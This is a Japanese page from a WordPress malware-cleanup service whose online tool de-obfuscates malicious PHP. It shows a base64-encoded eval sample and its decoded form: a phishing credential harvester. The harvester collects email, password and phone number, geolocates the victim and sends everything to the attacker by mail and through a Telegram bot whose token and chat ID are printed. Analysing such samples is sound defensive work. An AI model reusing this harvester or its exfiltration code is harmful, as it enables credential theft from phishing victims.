Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php eval(base64_decode('CiBnb3RvIFZ2VlpsOyBWdlZabDogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIE05ejdwOyBzT25LYzogaWYgKGVtcHR5KCRfUE9TVFsiXHg3MFwxNjdcMTY3Il0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJcMTQ1XHg2ZFwxNTUiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJcNDAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFs...



難読化されたPHPコード

<?php eval(base64_decode('CiBnb3RvIFZ2VlpsOyBWdlZabDogc2Vzc2lvbl9zdGFydCgpOyBnb3RvIE05ejdwOyBzT25LYzogaWYgKGVtcHR5KCRfUE9TVFsiXHg3MFwxNjdcMTY3Il0pKSB7ICRuYW1lRXJyID0gIlw0MCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJcMTQ1XHg2ZFwxNTUiXSkgPiA2MCkgeyAkbmFtZUVyciA9ICJcNDAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXHg3MFx4NzdcMTY3Il0pID4gNjApIHsgJG5hbWVFcnIgPSAiXHgyMCI7IH0gZWxzZWlmIChzdHJsZW4oJF9QT1NUWyJcMTQ1XHg2ZFwxNTUiXSkgPCAxKSB7ICRuYW1lRXJyID0gIlx4MjAiOyB9IGVsc2VpZiAoc3RybGVuKCRfUE9TVFsiXHg3MFx4NzdceDc3Il0pIDwgMSkgeyAkbmFtZUVyciA9ICJcNDAiOyB9IGVsc2UgeyAkZW1tID0gJF9QT1NUWyJcMTQ1XHg2ZFx4NmQiXTsgJHB3dyA9ICRfUE9TVFsiXDE2MFwxNjdcMTY3Il07ICRmb25uID0gJF9QT1NUWyJceDY2XHg2Zlx4NmVceDZlIl07ICRpcF9hZGRyZXNzID0gJF9TRVJWRVJbIlx4NTJceDQ1XHg0ZFwxMTdcMTI0XDEwNVx4NWZcMTAxXDEwNFwxMDRcMTIyIl07ICRsb2NhdGlvbiA9IGpzb25fZGVjb2RlKGZpbGVfZ2V0X2NvbnRlbnRzKCJceDY4XDE2NFx4NzRcMTYwXDcyXDU3XDU3XHg2OVx4NzBcMTUxXHg2ZVx4NjZcMTU3XHgyZVwxNTFcMTU3XDU3eyRpcF9hZGRyZXNzfVx4MmZcMTUyXHg3M1wxNTdceDZlIikpOyAkY291bnRyeSA9ICRsb2NhdGlvbi0+Y291bnRyeTsgJHN0YXRlID0gJGxvY2F0aW9uLT5yZWdpb247ICRjaXR5ID0gJGxvY2F0aW9uLT5jaXR5OyAkaXAgPSBnZXRlbnYoIlwxMjJcMTA1XDExNVwxMTdcMTI0XDEwNVwxMzdceDQxXHg0NFwxMDRcMTIyIik7ICRwb3J0ID0gJF9TRVJWRVJbIlwxMjJcMTA1XDExNVwxMTdcMTI0XHg0NVwxMzdceDUwXHg0ZlwxMjJceDU0Il07ICRob3N0bmFtZSA9IGdldGhvc3RieWFkZHIoJGlwKTsgJG1lc3NhZ2UgPSAiXHgzZFx4M2RceDNkXHgzZFx4M2RcNzVceDNkXDc1XHgzZFw3NVw3NVw3NVx4M2RceDNkXDc1XDc1XDc1XHgzZFx4MmJceDViXDQwXHgyMFwxMjJceDY1XDE2M1wxNjVcMTU0XDE2NFx4MjBceDVkXHgyYlw3NVx4M2RcNzVceDNkXDc1XDc1XDc1XHgzZFw3NVw3NVw3NVx4M2RceDNkXHgzZFw3NVw3NVx4M2RcNzVceGEiOyAkbWVzc2FnZSAuPSAiXHg0OVx4NDRcNDBceDIwXHgzYVw0MCIgLiAkZW1tIC4gIlx4YSI7ICRtZXNzYWdlIC49ICJcMTYwXDE2N1x4MjBceDNhXHgyMCIgLiAkcHd3IC4gIlx4YVwxMiI7ICRtZXNzYWdlIC49ICJceDcwXDE1MFwxNTdceDZlXDE0NVx4MjBceDNhXDQwIiAuICRmb25uIC4gIlx4YVwxMiI7ICRtZXNzYWdlIC49ICJcMTIwXDE1MFx4NmZcMTU2XHg2NVw0MFwxMTZceDc1XHg2ZFx4NjJceDY1XDE2Mlw0MFw0MFx4M2FceDIwIiAuICRmb25uIC4gIlx4YSI7ICRtZXNzYWdlIC49ICJcMTAzXDE1NFx4NjlceDY1XDE1Nlx4NzRceDIwXDE0M1wxNTdceDc1XHg2ZVx4NzRcMTYyXHg3OVw0MFx4M2FcNDAiIC4gJGNvdW50cnkgLiAiXHhhIjsgJG1lc3NhZ2UgLj0gIlwxMDNcMTU0XHg2OVx4NjVcMTU2XDE2NFx4MjBcMTYzXHg3NFwxNDFcMTY0XHg2NVx4MjBcNzJcNDAiIC4gJHN0YXRlIC4gIlx4YSI7ICRtZXNzYWdlIC49ICJcMTAzXDE1NFx4NjlceDY1XHg2ZVwxNjRceDIwXHg2M1wxNTFcMTY0XHg3OVx4MjBcNzJceDIwIiAuICRjaXR5IC4gIlwxMiI7ICRtZXNzYWdlIC49ICJceDQzXHg2Y1x4NjlceDY1XHg2ZVwxNjRcNDBcMTExXHg1MFx4MjBceDNhXDQwIiAuICRpcCAuICJceGEiOyAkbWVzc2FnZSAuPSAiXDc1XHgzZFw3NVx4M2RcNzVceDNkXDc1XDc1XHgzZFw3NVx4M2RcNzVceDNkXDUzXDQwXDEzM1w0MFwxMDNcMTYyXHg2NVwxNDFceDc0XDE0NVwxNDRceDIwXDE0Mlx4NzlcNDBcMTE3XDE1NVx4NjVcMTA3XDE0MVwxMTRceDZmXHg3Mlx4NDRceDIwXHg1ZFw0MFx4MmJcNzVcNzVceDNkXDc1XDc1XHgzZFx4M2RcNzVceDNkXHgzZFw3NVx4M2RceDNkXDEyIjsgJHNlbmQgPSAnJzsgJHN1YmplY3QgPSAiXHg0NFwxNDVceDc0XDQweyRpcH0iOyAkaGVhZGVycyAuPSAiXHg1OFw1NVx4NGRcMTQxXDE1MVx4NmNceDY1XHg3Mlw3Mlw0MFwxMjBceDQ4XHg1MFw0MFx4NzYiIC4gcGhwdmVyc2lvbigpIC4gIlwxNVx4YSI7IG1haWwoJHNlbmQsICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcnMpOyAkYm90VG9rZW4gPSAiXDY3XHgzNlx4MzRcNjdceDMzXHgzNlw3MFx4MzhceDM0XHgzOVw3MlwxMDFcMTAxXHg0N1wxNTZcMTMyXDEwNlwxMjBceDc3XHgzMlx4MzVceDc1XDYxXDE2MFwxNDZcMTU3XDYyXDY2XDE0MlwxMTZcMTIwXHgzNlx4NDJceDc4XHg0ZVx4NzZceDY2XHg2YVx4NmZcMTUyXDEyNlx4NWFceDRkXDExMFwxMTJceDQ1IjsgJGNoYXRJZCA9ICJcNjFceDMxXHgzN1w2Mlx4MzRcNjZcNjZcNjRceDM2XHgzMyI7ICR1cmwgPSAiXDE1MFwxNjRcMTY0XDE2MFx4NzNcNzJcNTdcNTdcMTQxXDE2MFx4NjlcNTZcMTY0XHg2NVwxNTRceDY1XDE0N1wxNjJcMTQxXDE1NVx4MmVcMTU3XHg3Mlx4NjdceDJmXHg2Mlx4NmZceDc0eyRib3RUb2tlbn1ceDJmXHg3M1wxNDVcMTU2XHg2NFwxMTVcMTQ1XDE2M1wxNjNceDYxXHg2N1wxNDVceDNmXHg2M1wxNTBcMTQxXDE2NFx4NWZceDY5XHg2NFw3NXskY2hhdElkfVw0NlwxNjRcMTQ1XDE3MFwxNjRcNzVceDc1XHg3M1x4NjVceDcyXDcyXHgyMHskZW1tfVx4MjVceDMwXDEwMVwxNjBceDc3XDcyXDQweyRwd3d9XHgyNVx4MzBcMTAxXDEyMFwxNTBceDZmXHg2ZVwxNDVcNzJcNDB7JGZvbm59XHgyNVw2MFwxMDFceDQzXHg2Y1x4NjlcMTQ1XDE1NlwxNjRceDIwXHg2M1wxNTdcMTY1XDE1Nlx4NzRcMTYyXDE3MVx4M2FcNDB7JGNvdW50cnl9XHgyNVw2MFwxMDFcMTAzXDE1NFx4NjlceDY1XHg2ZVx4NzRcNDBceDczXHg3NFx4NjFceDc0XHg2NVx4M2FcNDB7JHN0YXRlfVx4MjVcNjBcMTAxXDEwM1wxNTRceDY5XDE0NVx4NmVcMTY0XHgyMFwxNDNceDY5XDE2NFwxNzFceDNhXDQweyRjaXR5fVx4MjVceDMwXDEwMVx4NDNceDZjXDE1MVx4NjVcMTU2XHg3NFx4MjBceDY5XHg3MFx4M2FceDIweyRpcH1ceDI1XDYwXDEwMVw3NVw3NVw3NVw3NVw3NVw3NVw3NVx4M2RcNzVceDNkXHgzZFx4M2RcNzVceDJiXHgyMFwxMzNcNDBceDQzXDE2MlwxNDVcMTQxXDE2NFwxNDVcMTQ0XHgyMFwxNDJceDc5XDQwXDExN1wxNTVceDY1XDEwN1x4NjFceDRjXHg2ZlwxNjJcMTA0XDQwXDEzNVw0MFx4MmJceDNkXDc1XDc1XHgzZFw3NVw3NVw3NVx4M2RcNzVceDNkXHgzZFw3NVw3NSI7ICRzdHJlYW1PcHRpb25zID0gYXJyYXkoIlx4NzNcMTYzXHg2YyIgPT4gYXJyYXkoIlx4NzZceDY1XDE2Mlx4NjlcMTQ2XHg3OVx4NWZceDcwXHg2NVwxNDVceDcyIiA9PiBmYWxzZSwgIlwxNjZcMTQ1XHg3MlwxNTFceDY2XDE3MVwxMzdcMTYwXHg2NVx4NjVcMTYyXHg1ZlwxNTZcMTQxXDE1NVx4NjUiID0+IGZhbHNlKSwgIlx4NjhcMTY0XDE2NFwxNjAiID0+IGFycmF5KCJcMTU1XHg2NVwxNjRceDY4XHg2Zlx4NjQiID0+ICJcMTIwXDExN1wxMjNceDU0IikpOyAkY29udGV4dCA9IHN0cmVhbV9jb250ZXh0X2NyZWF0ZSgkc3RyZWFtT3B0aW9ucyk7ICRoYW5kbGUgPSBmb3BlbigkdXJsLCAiXDE2MiIsIGZhbHNlLCAkY29udGV4dCk7ICRyZXNwb25zZSA9IHN0cmVhbV9nZXRfY29udGVudHMoJGhhbmRsZSk7IGZjbG9zZSgkaGFuZGxlKTsgZWNobyAkcmVzcG9uc2U7IH0gZ290byB5Y3hOUTsgTTl6N3A6IGlmIChlbXB0eSgkX1BPU1RbIlwxNDVcMTU1XHg2ZCJdKSkgeyAkbmFtZUVyciA9ICJceDIwIjsgfSBnb3RvIHNPbktjOyB5Y3hOUTog')); ?>

デコード(難読化解除)されたコード

<?php

eval {
    session_start();
    if (empty($_POST["emm"])) {
        $nameErr = " ";
    }
    if (empty($_POST["pww"])) {
        $nameErr = " ";
    } elseif (strlen($_POST["emm"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["pww"]) > 60) {
        $nameErr = " ";
    } elseif (strlen($_POST["emm"]) < 1) {
        $nameErr = " ";
    } elseif (strlen($_POST["pww"]) < 1) {
        $nameErr = " ";
    } else {
        $emm = $_POST["emm"];
        $pww = $_POST["pww"];
        $fonn = $_POST["fonn"];
        $ip_address = $_SERVER["REMOTE_ADDR"];
        $location = json_decode(file_get_contents("http://ipinfo.io/{$ip_address}/json"));
        $country = $location->country;
        $state = $location->region;
        $city = $location->city;
        $ip = getenv("REMOTE_ADDR");
        $port = $_SERVER["REMOTE_PORT"];
        $hostname = gethostbyaddr($ip);
        $message = "==================+[  Result ]+==================\n";
        $message .= "ID  : " . $emm . "\n";
        $message .= "pw : " . $pww . "\n\n";
        $message .= "phone : " . $fonn . "\n\n";
        $message .= "Phone Number  : " . $fonn . "\n";
        $message .= "Client country : " . $country . "\n";
        $message .= "Client state : " . $state . "\n";
        $message .= "Client city : " . $city . "\n";
        $message .= "Client IP : " . $ip . "\n";
        $message .= "=============+ [ Created by OmeGaLorD ] +=============\n";
        $send = '';
        $subject = "Det {$ip}";
        $headers .= "X-Mailer: PHP v" . phpversion() . "\r\n";
        mail($send, $subject, $message, $headers);
        $botToken = "7647368849:AAGnZFPw25u1pfo26bNP6BxNvfjojVZMHJE";
        $chatId = "1172466463";
        $url = "https://api.telegram.org/bot{$botToken}/sendMessage?chat_id={$chatId}&text=user: {$emm}%0Apw: {$pww}%0APhone: {$fonn}%0AClient country: {$country}%0AClient state: {$state}%0AClient city: {$city}%0AClient ip: {$ip}%0A=============+ [ Created by OmeGaLorD ] +=============";
        $streamOptions = array("ssl" => array("verify_peer" => false, "verify_peer_name" => false), "http" => array("method" => "POST"));
        $context = stream_context_create($streamOptions);
        $handle = fopen($url, "r", false, $context);
        $response = stream_get_contents($handle);
        fclose($handle);
        echo $response;
    }
};

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.